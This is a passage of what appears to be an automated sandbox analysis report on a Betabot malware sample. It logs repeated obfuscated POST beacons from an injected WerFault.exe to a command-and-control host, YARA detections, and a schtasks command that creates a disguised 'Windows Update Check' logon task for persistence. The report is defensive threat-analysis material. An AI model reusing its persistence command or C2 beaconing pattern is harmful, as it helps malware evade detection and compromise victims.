                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:18.507456064 CET | 130 | OUT | POST /xyz/abc/order.php?page=127 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1054
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:18.507813931 CET | 131 | OUT | Data Raw: 7a 65 64 69 6e 6d 72 3d 38 31 32 38 30 33 61 31 32 62 66 62 33 66 32 39 39 62 66 38 65 32 37 37 66 63 37 37 32 34 66 39 37 34 36 39 31 37 62 65 37 38 38 62 36 33 61 39 39 34 38 64 38 62 35 61 63 38 66 66 37 65 30 30 26 78 61 78 61 64 3d 32 38 38
                      Data Ascii: zedinmr=812803a12bfb3f299bf8e277fc7724f9746917be788b63a9948d8b5ac8ff7e00&xaxad=28809715&bijqxyfgn=193fcfad128d1019812eba84ed396accd779a598b1ff4c7c84640d620113f1b11b1056c5739ef51b641991ad4b32c7f427d239c094c7f0f4efa69ddcd1d8224e13036c93c4ecac165
                      Dec 5, 2022 12:47:18.678555965 CET | 131 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:18 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      6 | 192.168.2.5 | 49697 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:21.944791079 CET | 133 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1042
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:21.945249081 CET | 134 | OUT | Data Raw: 61 61 61 67 3d 32 32 34 30 45 43 34 44 45 35 43 43 38 41 33 34 38 42 37 38 44 43 45 30 46 42 43 33 42 36 44 39 46 39 32 39 32 42 32 31 26 79 77 75 79 77 75 79 77 3d 37 37 33 33 35 39 34 38 26 63 65 67 6f 71 73 3d 41 37 38 41 35 32 43 41 33 31 44
                      Data Ascii: aaag=2240EC4DE5CC8A348B78DCE0FBC3B6D9F9292B21&ywuywuyw=77335948&cegoqs=A78A52CA31DBEB6242438D8C64501D92AF888388E6BF163B83A6A133F7C9682ADF01A27389514CEA6CAD6463430F67D19B957178F7995BA25E6208C16996A9D8B09124A9A153085A6F284C03D56A45C822DDE3B1448E
                      Dec 5, 2022 12:47:22.117517948 CET | 134 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:22 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:23.158463001 CET | 135 | OUT | POST /xyz/abc/order.php?page=33 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1008
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:23.158523083 CET | 136 | OUT | Data Raw: 65 6f 73 63 6d 71 61 65 3d 33 38 35 32 36 41 32 42 46 36 45 37 30 45 46 30 26 63 6b 6d 75 63 65 3d 33 32 31 30 39 36 36 38 26 67 73 79 6b 3d 34 34 66 32 35 63 66 36 31 38 61 66 35 30 37 37 33 35 39 63 61 62 36 37 37 66 30 36 64 30 33 64 34 33 62
                      Data Ascii: eoscmqae=38526A2BF6E70EF0&ckmuce=32109668&gsyk=44f25cf618af5077359cab677f06d03d43b2a088add3797d15f346242bdedaac51d6815be1d7bbb2de19094fb979f9c79d2bd14f4cb768f48c9ff58769559cb09a9fa6b62a2e1605e8d09eeb5bef5cfd5caac1a37d768fdc117cf93962f1a496a964
                      Dec 5, 2022 12:47:23.331394911 CET | 136 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:23 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:24.377403021 CET | 137 | OUT | POST /xyz/abc/order.php?pid=631 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1054
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:24.377502918 CET | 138 | OUT | Data Raw: 78 61 64 61 64 3d 34 32 32 33 38 31 38 33 26 7a 65 6a 69 6e 73 72 3d 61 38 37 61 38 61 65 62 63 66 31 32 35 38 32 63 35 64 36 64 62 34 30 38 37 34 66 32 64 34 30 35 30 32 32 66 39 66 64 66 33 66 37 34 39 33 35 37 65 63 38 31 30 61 33 35 30 32 66
                      Data Ascii: xadad=42238183&zejinsr=a87a8aebcf12582c5d6db40874f2d405022f9fdf3f749357ec810a3502fa4bca&bipqxefmt=F9F28A0AED8676D72BC15E14B4F5A4639291E3ADDFD8C1C4D065223BE2179BF7DBD3C6A22EE52944CA943B7A7A1AB67354293636D7B1B851F55B58D2DC4E23D6CD51F8F6C32D7EE15
                      Dec 5, 2022 12:47:24.599602938 CET | 138 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:24 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      7 | 192.168.2.5 | 49698 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:27.881628036 CET | 139 | OUT | POST /xyz/abc/order.php?id=4923518 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1010
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:27.881628036 CET | 140 | OUT | Data Raw: 73 6b 69 61 79 71 69 67 3d 38 30 63 36 37 62 39 34 33 65 65 62 31 62 37 65 37 37 26 71 67 63 73 6f 65 3d 37 31 30 30 36 34 30 38 26 75 6f 6f 69 3d 35 64 39 39 33 66 31 32 64 34 30 64 64 36 36 32 63 38 39 61 65 39 34 64 39 31 65 35 35 36 31 63 62
                      Data Ascii: skiayqig=80c67b943eeb1b7e77&qgcsoe=71006408&uooi=5d993f12d40dd662c89ae94d91e5561cb1d87b1b3034839aa60f7f08b7d77038d64cceaf2a593ad74f503997ab5423918d793795095ad03dd2f199e3dbc56e982c8007e9e6f1a4c8cf023b49877cf016001bd00d8b016123ff01b893991512be99
                      Dec 5, 2022 12:47:28.052932024 CET | 141 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:27 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:29.304999113 CET | 141 | OUT | POST /xyz/abc/order.php?pid=668 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1024
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:29.304999113 CET | 142 | OUT | Data Raw: 6c 77 68 73 64 6f 7a 3d 45 33 44 30 37 39 45 46 31 30 35 32 43 39 33 39 31 34 42 32 42 44 36 36 45 36 33 38 33 37 32 38 31 33 26 6a 73 62 6b 74 3d 31 33 32 38 34 36 38 35 26 6e 61 6e 61 6e 61 6e 61 74 3d 61 37 30 35 64 33 64 32 65 64 66 35 61 37
                      Data Ascii: lwhsdoz=E3D079EF1052C93914B2BD66E638372813&jsbkt=13284685&nanananat=a705d3d2edf5a71a8a4be7ed0a38a89bc0cb7ab1d5615e2f421a6058c90f47ed8c123427f1f7d16142d4756a9a6e173eac89fc9d77a2d3648a052950123c590fd77ac3fab65aa1803d732c844dc235a1df9d738a92e28e8
                      Dec 5, 2022 12:47:29.759772062 CET | 143 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:29 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:30.918195963 CET | 143 | OUT | POST /xyz/abc/order.php?id=8413675 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1050
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:30.918195963 CET | 144 | OUT | Data Raw: 6a 79 6e 63 72 67 70 3d 35 39 44 39 41 44 44 43 30 36 31 37 42 30 46 38 41 44 41 34 34 37 30 33 46 33 42 43 33 44 36 46 31 35 38 38 33 43 32 33 33 44 43 31 30 33 41 36 31 38 41 42 34 36 30 39 37 31 36 31 26 68 75 68 75 68 3d 32 35 36 39 37 30 37
                      Data Ascii: jyncrgp=59D9ADDC0617B0F8ADA44703F3BC3D6F15883C233DC103A618AB46097161&huhuh=25697077&lctkbsdul=472df24452d64360e499ab823368ff8b18975d7402c5eb47e93cc8acb2ae4f1747976dbfd49217ca6e85a455b9ec7d45c9a5c83a1a7394d64c694e82c066ece469bba3c83b05824297a6e
                      Dec 5, 2022 12:47:31.099140882 CET | 145 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:31 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      8 | 192.168.2.5 | 49699 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:34.423048973 CET | 146 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1044
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:34.423048973 CET | 147 | OUT | Data Raw: 6c 77 68 73 64 6f 7a 3d 36 33 38 38 38 36 30 39 26 6e 61 6e 61 6e 61 6e 61 6e 3d 32 63 36 65 61 62 30 37 35 65 37 30 30 64 66 37 35 35 39 32 38 31 35 33 35 65 66 31 33 38 63 33 30 61 38 38 66 62 30 32 31 36 61 35 26 70 65 74 69 78 3d 34 37 36 34
                      Data Ascii: lwhsdoz=63888609&nanananan=2c6eab075e700df7559281535ef138c30a88fb0216a5&petix=47642D853650C6E67B30C4DC930C215A2D9AF66A0BEFA2F5F254742D64A285A79A3A2288C32ED668382C8AEDDDD7BDE3F63825E3CE524D04EBD9EC3C128F35AC4004C87967C20C90DD9CAD0A5A62F74F76291
                      Dec 5, 2022 12:47:34.992084980 CET | 148 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:34 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:36.042872906 CET | 148 | OUT | POST /xyz/abc/order.php?id=8088252 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1024
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:36.042874098 CET | 149 | OUT | Data Raw: 71 6d 69 65 75 71 6d 69 3d 30 36 34 32 32 42 33 42 32 32 35 45 32 43 43 36 45 36 34 33 38 44 42 32 39 45 46 42 32 32 35 43 26 6f 69 63 77 6b 65 3d 31 33 37 38 36 35 33 38 26 73 71 6f 6d 3d 37 42 38 34 36 41 43 33 30 46 42 41 33 41 44 30 44 41 43
                      Data Ascii: qmieuqmi=06422B3B225E2CC6E6438DB29EFB225C&oicwke=13786538&sqom=7B846AC30FBA3AD0DACAB57936557D6E5367EC9B78D8AE83A0392B99EC4F4243893C2C3478538B229FFF1993512E0FE733131E5BC6BC2E5D55550ADEE89DA1DF95109F7483097DD89E119377882D799AED5C3B15CB4C401F41A1
                      Dec 5, 2022 12:47:36.474066019 CET | 150 | OUT | POST /xyz/abc/order.php?id=8088252 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1024
                      Cache-Control: no-cache
                      Data Ascii: qmieuqmi=06422B3B225E2CC6E6438DB29EFB225C&oicwke=13786538&sqom=7B846AC30FBA3AD0DACAB57936557D6E5367EC9B78D8AE83A0392B99EC4F4243893C2C3478538B229FFF1993512E0FE733131E5BC6BC2E5D55550ADEE89DA1DF95109F7483097DD89E119377882D799AED5C3B15CB4C401F41A1B2CCC325E8D45657E9658B507C3172D404957AA52D1DF675E3FAA404033CF02E9259E3E091052ED69A79E7DBD3999E7E73DC439F530078AC16A77E0A1315D3E11D70DA4FF7517EBD58FD&uuuuoo1=61F04BC27EF021C250F01EC245F003C243F01CC266F010C256F010C27EF020C257F018C241F01AC256F018C24FF014C202F049C20CF044C20CF040C27EF008C254F01FC247F002C24EF019C252F012C20CF014C25AF014C2&uuuuoo2=4BF014C25AF001C24EF01EC250F014C20CF014C25AF014C2&uuuuoo3=66F034C271F03AC276F03EC272F05CC215F040C214F025C215F046C213F02DC243F01DC244F01EC24CF002C2&uuuuoo4=6BF01FC256F014C24EF059C270F058C202F032C24DF003C247F059C276F03CC20BF043C202F032C272F024C202F047C214F041C212F051C262F051C210F05FC216F041C202F036C26AF00BC2&uuuuoo5=6FF018C241F003C24DF002C24DF017C256F051C260F010C251F018C241F051C266F018C251F001C24EF010C25BF051C263F015C243F001C256F014C250F0
                      Dec 5, 2022 12:47:36.645634890 CET | 151 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:36 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:37.686542988 CET | 151 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1052
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:37.686594963 CET | 152 | OUT | Data Raw: 63 6b 73 75 63 6b 6d 75 3d 44 33 43 44 41 30 33 30 33 45 41 31 46 45 37 38 37 31 32 33 41 39 37 37 45 31 45 36 38 46 44 31 46 34 35 36 34 31 36 36 32 41 42 30 43 44 36 39 31 42 38 36 44 39 35 45 38 44 32 41 26 61 67 6d 6d 73 79 3d 37 37 31 37 30
                      Data Ascii: cksuckmu=D3CDA0303EA1FE787123A977E1E68FD1F45641662AB0CD691B86D95E8D2A&agmmsy=77170004&eoyc=2E4BA6A2DE58838FB5699879CC77408586EEAF4DAB3EEF3944310044ABA4C2B6F090C755D7EF0F251FA9B6337EA5790FBD1C01E700DC075B50D466A78CA14FA3B38F92260388EE5C8B6E8EF9
                      Dec 5, 2022 12:47:37.857947111 CET | 153 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:37 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                      9 | 192.168.2.5 | 49700 | 64.70.19.203 | 80 | C:\Windows\SysWOW64\WerFault.exe
                      Timestamp | kBytes transferred | Direction | Data
                      Dec 5, 2022 12:47:41.113176107 CET | 154 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1048
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:41.113193989 CET | 155 | OUT | Data Raw: 64 67 6a 6d 70 3d 35 44 30 45 45 43 33 42 34 38 33 39 35 34 36 42 46 45 33 36 33 38 34 34 44 36 32 30 30 33 30 32 39 33 35 36 43 41 26 62 63 64 65 66 67 68 69 6a 3d 37 38 35 32 38 31 33 31 26 66 6b 70 75 7a 65 6a 3d 42 36 30 41 37 36 36 46 35 45
                      Data Ascii: dgjmp=5D0EEC3B4839546BFE363844D62003029356CA&bcdefghij=78528131&fkpuzej=B60A766F5E5454AD4B65BA93751F0EEAB01545A9B7C5BBCE0D33A9AC85C7FDC2B203F4D37938BD50C1117364426EF575084BED302EFBBACB3B0F01DDECCF722B76967902C8E92427E48CCE1AEAC3D3A54C163EA7001
                      Dec 5, 2022 12:47:41.284538031 CET | 155 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:41 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:42.314713001 CET | 156 | OUT | POST /xyz/abc/order.php?id=3966837 HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1066
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:42.315095901 CET | 157 | OUT | Data Raw: 72 69 66 77 74 3d 37 37 37 31 34 34 36 31 26 74 6d 6c 65 64 77 70 3d 43 36 31 42 36 31 36 42 36 31 39 34 46 45 33 34 30 30 38 31 32 36 34 38 31 34 35 41 43 34 44 38 43 37 41 37 44 36 37 46 41 46 39 31 34 34 41 34 31 36 45 32 43 46 34 30 31 32 42
                      Data Ascii: rifwt=77714461&tmledwp=C61B616B6194FE3400812648145AC4D8C7A7D67FAF9144A416E2CF4012B5FC82D6A9286A21B9&vqrmnidez=22D77112EFDC7D278EC3254C4FDF6991B383375B309997A96B2FEEF3581CE11D69224A3840E71F00C66394BC14A87536F9BB68E8E3C5B8C2BD57A1A56CDF400C34125
                      Dec 5, 2022 12:47:42.493673086 CET | 158 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:42 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                      Dec 5, 2022 12:47:43.551273108 CET | 158 | OUT | POST /xyz/abc/order.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                      Host: issasname.ws
                      Content-Length: 1052
                      Cache-Control: no-cache
                      Dec 5, 2022 12:47:43.551273108 CET | 159 | OUT | Data Raw: 72 69 7a 71 68 3d 37 32 36 34 32 35 31 31 26 74 6d 66 79 72 6b 64 3d 62 38 64 33 36 30 33 39 63 30 34 32 38 65 32 66 61 32 34 35 30 38 61 37 65 63 32 39 62 39 31 33 64 38 66 33 31 62 62 30 34 31 38 35 35 65 32 39 32 33 61 30 65 61 66 35 35 32 61
                      Data Ascii: rizqh=72642511&tmfyrkd=b8d36039c0428e2fa24508a7ec29b913d8f31bb041855e2923a0eaf552a6bb&vqlgbwrmh=da48d6697df215e925207bc23e24ff40e3f53af3755a956bcb6f751fbfd87e3055e8ade9f673a0c1ccfc4b206440afd0ed214e45dfb331a51c89a5e5c22bfb8796acdc8bcec674441a2
                      Dec 5, 2022 12:47:43.731421947 CET | 160 | IN | HTTP/1.1 405 Not Allowed
                      Server: openresty
                      Date: Mon, 05 Dec 2022 11:47:43 GMT
                      Content-Type: text/html
                      Content-Length: 154
                      Connection: keep-alive
                      Allow: GET,HEAD
                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>



                      Target ID:0
                      Start time:12:46:01
                      Start date:05/12/2022
                      Path:C:\Users\user\Desktop\BbbEtaIxAU.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\BbbEtaIxAU.exe
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000000.00000002.304781383.0000000000AE8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Target ID:1
                      Start time:12:46:03
                      Start date:05/12/2022
                      Path:C:\Windows\SysWOW64\schtasks.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
                      Imagebase:0x150000
